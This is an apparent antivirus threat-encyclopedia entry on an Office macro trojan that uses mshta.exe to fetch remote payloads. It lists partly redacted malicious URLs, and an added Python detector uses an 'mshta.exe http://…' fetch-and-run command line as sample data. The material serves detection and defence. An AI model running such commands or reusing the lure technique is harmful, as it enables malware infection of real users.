MSOffice/PasswordProtected.B3CF!tr
Analysis
MSOffice/PasswordProtected.B3CF!tr is a generic detection for a trojan.
Since this is a generic detection, malware detected as MSOffice/PasswordProtected.B3CF!tr may have varying behaviour.
Below are some of its observed characteristics/behaviours:
- This malware arrives as a password protected archive containing an MS Office document. The password to the archive is approximately 3-6 digits in length. Upon opening the document, an image in the file declares the document as protected and asks the user to enable editing/content so that macros can run. If an unsuspecting user clicks "Enable Content", the malware continues executing and automatically uses mshta.exe to connect to a malicious domain, potentially downloading further components/payloads of the attack.
- Below are images of the malicious document:
- Figure 1: Before enabling editing/content.
- Figure 2: After enabling editing/content.
- Figure 3: Utilizing mshta.exe.
- Below are some of the sites associated with the trojan:
- http://91.2[removed]as/se.html
- http://91.2[removed]nn/se.html
- http://91.2[removed]aa/se.html
- Following are some of the exact IOCs/file hashes associated with this detection:
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
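The infection chain described in the analysis (Office document with macros enabled spawning mshta.exe to reach a remote site) can be caught from process-creation telemetry. The detector below is an added example, not code from the Fortinet entry; the record layout (parent_image, image, command_line) and the sample events are constructed for illustration.

```python
# Added example (not from the original entry): flag an Office process that
# launches mshta.exe with a remote URL, the chain described in the analysis.
# The event layout is an assumption, not any specific product's log format.
import re
from typing import Dict, List

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
URL_RE = re.compile(r"(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)

# Constructed sample process-creation records for demonstration only.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe http://91.2[removed]as/se.html"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe C:\Users\user\AppData\Local\Temp\setup.hta"},
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c dir"},
]


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def is_office_spawned_mshta(event: Dict[str, str]) -> bool:
    """True when an Office process starts mshta.exe pointed at a remote URL.

    Local .hta files launched by non-Office parents are not flagged here,
    which keeps the rule focused on the macro -> mshta.exe -> domain chain.
    """
    if basename(event["parent_image"]) not in OFFICE_PARENTS:
        return False
    if basename(event["image"]) != "mshta.exe":
        return False
    return URL_RE.search(event["command_line"]) is not None


def find_suspicious(events: List[Dict[str, str]]) -> List[str]:
    """Return the command lines of all events matching the detection."""
    return [e["command_line"] for e in events if is_office_spawned_mshta(e)]


if __name__ == "__main__":
    for line in find_suspicious(SAMPLE_EVENTS):
        print("ALERT: Office-spawned mshta.exe with remote URL:", line)
```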
Detection Availability
- FortiGate
- FortiClient
- FortiAPS
- FortiAPU
- FortiMail
- FortiSandbox
- FortiWeb
- Web Application Firewall
- FortiIsolator
- FortiDeceptor
- FortiEDR